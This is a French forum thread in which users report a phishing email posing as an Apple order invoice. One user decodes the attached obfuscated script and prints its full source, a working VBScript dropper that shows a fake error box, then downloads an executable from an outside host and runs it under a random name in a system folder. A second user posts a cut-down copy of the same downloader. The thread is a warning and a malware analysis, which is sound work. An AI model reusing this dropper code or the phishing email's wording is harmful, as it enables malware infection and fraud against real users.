salut tout le monde, je viens de recevoir un mail qui m'a bien fait flipper:
Chère Client(e),
Pour faire suite à notre précédent mail, nous avons le plaisir de vous informer que votre commande est validée.
suite à votre commande n°EO202608527 passée sur le site apple.com et expédiée. Nous vous transmettons la facture correspondante.
Vous trouverez votre facture 50522231823V en télérèglement concernant votre commande EO202608527 du 3 jan 2012 sur le lien suivant :
http://www.apple.com/clients/download/facture50522231823v.zip
Ce message confirme que vous avez acheté les articles suivants :
Apple - Macbook - Ordinateur portable 13" - Intel Core 2 Duo - 250 Go - RAM 2048 Mo - MacOS X 10.6 - Jusqu'à 10h d'utilisation - NVIDIA GeForce GT 320M - Blanc
Montant total de la commande : EUR 995,11
Infos livraison : Commande expédiée en 1 colis
Mode de livraison : Prioritaire
Conditions de livraison : Envoyer les articles en un minimum de colis
Total articles (HT) : EUR 823,18
Livraison (HT) : EUR 6,68
Emballage cadeau TTC : EUR 2,17
---------------------------
Total HT : EUR 832,03
TVA : EUR 163,08
---------------------------
Montant total pour cette commande : EUR 995,11
Le montant à payer vous sera facturé à l'aide du moyen de paiement que vous avez choisis :
Nous avons le plaisir de vous informer que votre colis 6920829110901078 est prêt.
Il sera donc confié à notre transporteur en charge de sa livraison très prochainement.
Notre prochain mail vous confirmera la bonne prise en charge de votre colis par le transporteur.
Vous pouvez bien entendu suivre votre commande via votre Espace clients.
Nous vous remercions de votre confiance.
Nous vous en souhaitons bonne réception et espérons vous retrouver
très prochainement
Cordialement,
Votre Service Clients
sur coup j'ai cru m'être fait pirater mon compte apple, mais regardant sur le net j'ai vu que je n'est pas était le seul a recevoir ce mail qui cherchait a installer un virus sur mon pc.
OUF! 1 minute de plus et je faisait opposition a ma CB, tous ca pour vous dire de faire tres attention
moi je.vois ca je m evanouis
Pas mal l'adresse mail quand même
Il faut savoir que la terminaison du mail c'est toujours le nom de l'entreprise/Holding etc..
Donc le véritable mail serait "support@apple.fr" et non l'inverse.
De plus, si commande il y avait, normalement l'adresse de livraison est indiquée.
Bien évidement, fake.
j'ai eu exactement le même.
Le mail auquel on répond est "support@apple.fr"
Le lien avec la facture renvoi non pas sur le site d'apple, mais sur un site chelou d'un certain Michel Labrecque , un electricien basé au quebec... http://www.michellabrecque.com/ ....
Plus que chelou tout ça...
Mais de peur à avoir, nos comptes sont nickels.
Mais ce mail est frauduleux donc attention!!
Je viens de le recevoir aujourd'hui.
1 - J’écris au responsable du site, sachant que la piece jointe est en plus un troyen...
2 - je fais suivre à Apple.
Le pire est que je ne suis même pas client apple.
Bonjour les fautes.
Si je vois ça, je suis pas à l'abri de tomber dans les pommes
À mon avis, soit je fais une crise cardiaque à la fin de la lecture du mail, soit en courant sur mon téléphone pour appeler Apple.
Haa ok en fait le lien c'est le virus? Mais je croyais que les virus ne passaient pas sur Mac....
Mon père a déjà reçu ça aussi.
Les gars apple offre la livraison a partir de 121€ je pense ...
J'ai recu le même mail aujourd'hui!
Même chose pour moi : reçu ce jour mais venant de support@apple.fr
Incroyable
Tiens recu même message ce jour...
Avec un ZIP en pièce jointe, et dans le ZIP un fichier JVS ou un truc comme ça.
Allez je suis curieux, je l'ouvre sur un vieux PC avec le bloc note, et dedans une suite de :
chr((((( 331540/3014 ))))) & chr((((( 5474-5434 ))))) & chr((((( 149454/1311 )))))
Allez ca veut dire quoi... Bon comme je suis une brèle en informatique, je développe un ch'tit traducteur en français car j'ai bien compris qu'il convertit en caractère le résultat d'une opération.
Voici le code source qui en découle (je déconseille de le copier et de l'éxécuter !!!)
-----------
WScript.Sleep(5000)
x=msgbox("The application failed to initialize properly (0x0000022). Click on OK to terminate the application." ,16, "AcroRd32.exe - Application Error")
WScript.Sleep(10000)
ExecuteGlobal(
Randomize
nameLength = 10
randomname = ""
Do While Len(randomname) < nameLength
currRandCur = Int(Rnd * 255)
If currRandCur >= Asc("a") And currRandCur <= Asc("z") _
Or currRandCur >= Asc("A") And currRandCur <= Asc("Z") _
Or currRandCur >= Asc("0") And currRandCur <= Asc("9") Then
randomname = randomname & Chr(currRandCur)
End If
Loop
strSource = "http://www.clctf.com/calc.exe"
strDest = WScript.CreateObject("Scripting.FileSystemObject")
.GetSpecialFolder(2)
& "\" & randomname & ".exe"
set HTTP = CreateObject("Microsoft.XMLHTTP")
HTTP.open "GET", strSource, False
HTTP.send
set Stream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateNotExist = 1
Const adSaveCreateOverWrite = 2
Stream.type = adTypeBinary
Stream.open
Stream.write HTTP.responseBody
Stream.savetofile strDest, adSaveCreateOverWrite
set Stream = nothing
set HTTP = nothing
set objWMIService = getobject("winmgmts://./root/cimv2")
Set objProcess = objWMIService.Get("Win32_Process")
Set objProgram = objProcess.Methods_( _
"Create").InParameters.SpawnInstance_
objProgram.CommandLine = strDest
Set strShell = objWMIService.ExecMethod("Win32_Process", "Create", objProgram)
--------
Alors je ne maitrise pas du tout ce langage donc si quelqu'un voit dedans une trace du destinataire (le site clctf.com qui est situé au Québec) ???
Je serais curieux de savoir qui est à l'origine de cela pour donner une jolie petite suite...
ce script télécharge un virus qui se fait passer pour la calculatrice windows sur le serveur clctf puis le renomme avec un nom au hasard suivi de .exe dans un dossier système (GetSpecialFolder(2) & "\" & randomname & ".exe") pour que tu ne le retrouves plus ensuite dans ton pc.
Difficile de savoir ce que ce .exe fait exactement par contre mais je pencherais pour un truc qui récupère les données personnelles, vu que les virus "juste pour faire chier" ont quasiment disparu au profit de "donne moi ton fric".
Moral du topic: FAITES ATTENTION AUX MAILS DE PHISHINGS !!!
J'écris en MAJ pour que mon post passe pas inaperçu.
Coucou tous le monde,
Ayant rencontré le mail et en faisant l'analyse du script VBS j'en suis arrivée au même résultat que décrit précédemment mais j'ai voulu récupérer le fichier EXE pour le tester sur une VM et avoir sa signature pour le supprimer en cas de besoin. J'ai obtenu en laissant tourner le script jusqu'au téléchargement du fichier dans un répertoire que MOI j'avais convenu un document HTML !!! Bizarre non ??? Qu'est que j'ai loupé ?
Voici ce que j'ai fais tourner :
strSource = "http://www.clctf.com/calc.exe"
strDest = "d:\Download\VBS\AppliTrojan.txt"
set HTTP = CreateObject("Microsoft.XMLHTTP")
HTTP.open "GET", strSource, False
HTTP.send
set Stream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateNotExist = 1
Const adSaveCreateOverWrite = 2
Stream.type = adTypeBinary
Stream.open
Stream.write HTTP.responseBody
Stream.savetofile strDest, adSaveCreateOverWrite
set Stream = nothing
set HTTP = nothing
Comment un fichier HTML peut être lancer ??? Pourquoi le mettre dans un EXE ? Quelle est l’intérêt ?
Merci d'avance.
J'ai pas encore reçu de mail moi . Ça devrait pas tarder .
C'est sympa de partager
y a encore des gens qui voient pas que c'est un fake? c'est triste quand meme, un fichier zip en pj, , un mail bidon, mdr, c'est si gros !